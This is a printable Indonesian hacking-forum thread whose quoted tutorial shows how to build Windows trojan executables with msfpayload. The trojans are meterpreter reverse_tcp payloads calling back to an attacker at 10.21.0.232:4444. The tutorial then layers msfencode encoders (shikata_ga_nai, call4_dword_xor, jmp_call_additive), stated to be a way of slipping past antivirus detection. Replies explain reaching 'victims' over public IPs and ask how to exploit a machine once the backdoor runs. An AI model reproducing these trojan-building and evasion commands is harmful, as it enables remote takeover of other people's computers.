Indonesian Back|Track Team
[ENCODING] Membuat Virus Trojan Dengan Metasploit Extension - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html)
+---- Forum: Metasploit (https://www.indonesianbacktrack.or.id/forum/forum-122.html)
+---- Thread: [ENCODING] Membuat Virus Trojan Dengan Metasploit Extension (/thread-1252.html)

Pages: 1 2


RE: [ENCODING] Membuat Virus Trojan Dengan Metasploit Extension - smoker9 - 11-28-2011

salut dah ane... n ternyata2 bt emang maknyus....wkwkk....


RE: [ENCODING] Membuat Virus Trojan Dengan Metasploit Extension - rahmat2222 - 11-29-2011

ini bisa exploit komputer lewat internet atau hanya lan?
dan cara exploitnya gimana?


maaf, double post, soalnya yg di atas ga bisa di edit

dan maaf banyak nanya


RE: [ENCODING] Membuat Virus Trojan Dengan Metasploit Extension - koecroet - 11-29-2011

(11-29-2011, 12:25 AM)rahmat2222 Wrote: ini bisa exploit komputer lewat internet atau hanya lan?
dan cara exploitnya gimana?


maaf, double post, soalnya yg di atas ga bisa di edit

dan maaf banyak nanya

bisa kok lewat internet/public. asal ente tau ip public ente ama ip public victim. & jgan lupa misalkan ente pake adsl kaya speedy itu harus di bridge dulu biar ente langsung nge public


RE: [ENCODING] Membuat Virus Trojan Dengan Metasploit Extension - rahmat2222 - 11-29-2011

(11-29-2011, 06:49 AM)koecroet Wrote:
(11-29-2011, 12:25 AM)rahmat2222 Wrote: ini bisa exploit komputer lewat internet atau hanya lan?
dan cara exploitnya gimana?


maaf, double post, soalnya yg di atas ga bisa di edit

dan maaf banyak nanya

bisa kok lewat internet/public. asal ente tau ip public ente ama ip public victim. & jgan lupa misalkan ente pake adsl kaya speedy itu harus di bridge dulu biar ente langsung nge public

bridge maksudnya gimana?

klo victimnya sudah menjalankan backdoornya, cara exploitnya gimana?
memakai exploits dan payload yg mana?

maaf, banyak nanya
saya masih baru memakai metasploit


RE: [ENCODING] Membuat Virus Trojan Dengan Metasploit Extension - cassaprodigy - 11-29-2011

(11-29-2011, 10:25 AM)rahmat2222 Wrote:
(11-29-2011, 06:49 AM)koecroet Wrote:
(11-29-2011, 12:25 AM)rahmat2222 Wrote: ini bisa exploit komputer lewat internet atau hanya lan?
dan cara exploitnya gimana?


maaf, double post, soalnya yg di atas ga bisa di edit

dan maaf banyak nanya

bisa kok lewat internet/public. asal ente tau ip public ente ama ip public victim. & jgan lupa misalkan ente pake adsl kaya speedy itu harus di bridge dulu biar ente langsung nge public


bridge maksudnya gimana?

klo victimnya sudah menjalankan backdoornya, cara exploitnya gimana?
memakai exploits dan payload yg mana?

maaf, banyak nanya
saya masih baru memakai metasploit

di bridge maksudnya pada router modem di setting ke bridge conection .. dilanjutkan dengan memasukan perintah pppoeconf pada terminal di backtrack ente .. terus tinggal masukin user dan password


RE: [ENCODING] Membuat Virus Trojan Dengan Metasploit Extension - [H2] - 02-24-2013

wahhh copas punya mas red ini, tp keep share deh :hehehehe


RE: [ENCODING] Membuat Virus Trojan Dengan Metasploit Extension - copaslamer - 02-26-2013

(11-20-2011, 07:28 PM)gembel Wrote: Kali ini saya akan memberikan sedikit pengarahan untuk membuat payload trojan dengan msfpayload lalu meng-encoding-nya dengan msfencode.

Preparation:
1. msfpayload

Spoiler! :
Quote:


2. msfencode

Spoiler! :


Note: Dengan menginstall Metasploit, berarti kamu telah memiliki kedua requirements di atas.

Walkthrough:

Kali ini saya akan membuat payload trojan untuk melakukan interaksi dengan metasploit milik saya. IP address saya 10.21.0.232, dan Metasploit saya melakukan listening trojan pada port 4444.Buka terminal, lalu masukan perintah:

Code:
root@red-dragon:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 X > /tmp/trojan1.exe

Spoiler! :


Keterangan:
Spoiler! :
Quote:Trojan Diatas berfungsi untuk:
1.Membuka sesi meterpreter
2.Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.21.0.232
3. File di beri nama trojan1.exe pada direktori /tmp/


Ini adalah payload standar tanpa encoding, dan sangat mudah dikenali antivirus sebagai virus trojan. Untuk itu, kita akan melakukan encoding virus dengan bantuan msfencode.

Buka terminal lagi, lalu masukan perintah:
Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > /tmp/trojan2.exe

Spoiler! :


Keterangan:
Spoiler! :
Quote:1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.21.0.232 dan mendengarkan pada port 4444
3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)
4. msfencode melakukan encoding payload dengan x86/shikata_ga_nai
5. msfencode melakukan encoding dengan format ektensi .exe
6. File di beri nama trojan2.exe pada direktori /tmp/



Jika masih terdeteksi virus, mungkin metode ini bisa melewati antivirus. Buka terminal, lalu masukan perintah.

Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -t exe > /tmp/trojan3.exe

Spoiler! :


Keterangan:
Spoiler! :
Quote:1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.21.0.232 dan mendengarkan pada port 4444
3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)
4. msfencode melakukan encoding payload dengan arsitektur x86 (32 bit)
5. msfencode melakukan encoding payload dengan menghindari shell code \x00\xff saat melakukan generating shell code.
6. msfencode melakukan encoding payload dengan x86/shikata_ga_nai
7. msfencode melakukan encoding dengan format ektensi .exe
8. File di beri nama trojan3.exe pada direktori /tmp/



Jika masih terdeteksi virus, mungkin metode ini bisa melewati antivirus. Buka terminal, lalu masukan perintah.

Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -c 8 -t exe > /tmp/trojan3.exe

Spoiler! :


Keterangan:
Spoiler! :
Quote:1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.21.0.232 dan mendengarkan pada port 4444
3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)
4. msfencode melakukan encoding payload dengan arsitektur x86 (32 bit)
5. msfencode melakukan encoding payload dengan menghindari shell code \x00\xff saat melakukan generating shell code.
6. msfencode melakukan encoding payload dengan x86/shikata_ga_nai
7. x86/shikata_ga_nai melakukan encoding payload sebanyak 8 kali
8. msfencode melakukan encoding dengan format ektensi .exe
9. File di beri nama trojan3.exe pada direktori /tmp/


Jika masih terdeteksi virus, mungkin metode ini bisa melewati antivirus. Buka terminal, lalu masukan perintah.

Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -c 8 -v -t exe > /tmp/trojan4.exe

Spoiler! :


keterangan:
Spoiler! :
Quote:1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.21.0.232 dan mendengarkan pada port 4444
3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)
4. msfencode melakukan encoding payload dengan arsitektur x86 (32 bit)
5. msfencode melakukan encoding payload dengan menghindari shell code \x00\xff saat melakukan generating shell code.
6. msfencode melakukan encoding payload dengan x86/shikata_ga_nai
7. x86/shikata_ga_nai melakukan encoding payload sebanyak 8 kali
8. msfencode meingkatkan verbose level
9. msfencode melakukan encoding dengan format ektensi .exe
10. File di beri nama trojan4.exe pada direktori /tmp/


Jika masih terdeteksi virus, mungkin metode ini bisa melewati antivirus. Buka terminal, lalu masukan perintah.

Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -c 8 -v -t raw | msfencode -e x86/call4_dword_xor -t exe > /tmp/trojan6.exe

Spoiler! :


Keterangan:
Spoiler! :
Quote:1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.21.0.232 dan mendengarkan pada port 4444
3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)
4. msfencode melakukan encoding payload dengan arsitektur x86 (32 bit)
5. msfencode melakukan encoding payload dengan menghindari shell code \x00\xff saat melakukan generating shell code.
6. msfencode melakukan encoding payload dengan x86/shikata_ga_nai
7. x86/shikata_ga_nai melakukan encoding payload sebanyak 8 kali
8. msfencode meingkatkan verbose level
9. msfencode menyimpan payload dalam format RAW
10. msfencode melakukan encoding kembali dengan encoder x86/call4_dword_xor
11. msfencode melakukan encoding dengan format ektensi .exe
12. File di beri nama trojan6.exe pada direktori /tmp/


Jika masih terdeteksi virus, mungkin metode ini bisa melewati antivirus. Buka terminal, lalu masukan perintah.
Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -c 8 -v -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t exe > /tmp/trojan7.exe
Spoiler! :


Keterangan:
Spoiler! :
Quote:1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.21.0.232 dan mendengarkan pada port 4444
3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)
4. msfencode melakukan encoding payload dengan arsitektur x86 (32 bit)
5. msfencode melakukan encoding payload dengan menghindari shell code \x00\xff saat melakukan generating shell code.
6. msfencode melakukan encoding payload dengan x86/shikata_ga_nai
7. x86/shikata_ga_nai melakukan encoding payload sebanyak 8 kali
8. msfencode meingkatkan verbose level
9. msfencode menyimpan payload dalam format RAW
10. msfencode melakukan encoding kembali dengan encoder x86/call4_dword_xor
11. x86/call4_dword_xor melakukan encoding sebanyak 2 kali
12 x86/call4_dword_xor menyimpan payload dalam format RAW
13. msfencode melakukan encoding dengan encoder x86/jmp_call_additive
14. x86/jmp_call_additive melakukan encoding payload sebanyak 2 kali
15. msfencode melakukan encoding dengan format ektensi .exe
16. File di beri nama trojan4.exe pada direktori /tmp/


Sampai sejauh ini, virus-virus jahat kita sudah bersembunyi dengan baik di balik amplop yang dibuat pada encoder. Dan jika masih terseteksi, kamu bisa menggunakan encoder lain, mengkombinasikan encoder, meningkatkan banyaknya encoding yang dilakukan, atau memilih payload lain.

Created by:
red-dragon

Supported by:
Blue Dragon

Loced By:
Yoshephine Handini

Sumber:Red-Dragon

My Site: Gembel

saya coba deh


RE: [ENCODING] Membuat Virus Trojan Dengan Metasploit Extension - Kresna - 02-27-2013

coba ditambahin script buat bypass antivirus, makin mantep deh nih .. Big Grin


RE: [ENCODING] Membuat Virus Trojan Dengan Metasploit Extension - faizul amali - 04-23-2013

Mantap Om, Izin download and praktek


RE: [ENCODING] Membuat Virus Trojan Dengan Metasploit Extension - hexadecimal - 06-11-2013

mantap.. old neh thread :v tapi ilmunya harus di coba Big Grin